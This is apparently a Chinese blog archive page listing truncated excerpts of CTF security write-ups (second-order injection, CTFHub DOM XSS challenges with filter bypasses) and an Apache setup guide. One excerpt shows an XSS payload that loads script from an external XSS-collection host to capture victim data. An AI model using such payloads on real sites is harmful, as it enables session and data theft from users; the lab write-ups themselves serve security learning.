07 2023 档案

摘要:想直接查看payload的点这里 前言 二次注入(Second-Order Injection)是指攻击者在应用程序中注入恶意数据,然后在稍后的操作或不同的上下文中再次使用该恶意数据,导致安全漏洞。它通常发生在数据库查询、数据导出、报告生成等过程中。 典型的二次注入示例包括在用户注册时注入恶意代码, 阅读全文
posted @ 2023-07-08 02:04 CVE-柠檬i 阅读(29) 评论(0) 推荐(0) 编辑
摘要:前文:DOM反射XSS 进入网站,直接查看源代码,下面是关键代码,这里有xss漏洞: <script> var target = location.search.split("=") if (target[0].slice(1) == "jumpto") { location.href = targ 阅读全文
posted @ 2023-07-05 03:05 CVE-柠檬i 阅读(285) 评论(0) 推荐(0) 编辑
摘要:前文链接:DOM反射xss 这次直接浏览器输入payload,发现 script 被过滤掉了 </textarea>'"><script src=http://xsscom.com//cZ2vvZ></script> 碰到这种情况不要慌,下面给出两种方法绕过过滤关键字。 双写绕过 </textare 阅读全文
posted @ 2023-07-05 00:42 CVE-柠檬i 阅读(41) 评论(0) 推荐(0) 编辑
摘要:前言:本文需要注册一个xss平台,以接收xss反弹回来的数据,请自己在互联网上寻找合适的xss平台 1. 构造闭合语句 根据题目提示,判断网站存在DOM xss漏洞 查看页面源代码,发现关键位置,其中CTFHub is very niubility 是我们的可控范围 <script> $("#tex 阅读全文
posted @ 2023-07-04 23:44 CVE-柠檬i 阅读(291) 评论(0) 推荐(0) 编辑
摘要:安装环境 演示服务器版本为CentOS 8 安装apache 下载apache yum install httpd httpd-devel 启动apache服务器 systemctl start httpd 设置apache开机自启 systemctl enable httpd 查看apache运行 阅读全文
posted @ 2023-07-04 20:27 CVE-柠檬i 阅读(16) 评论(0) 推荐(0) 编辑

点击右上角即可分享
微信分享提示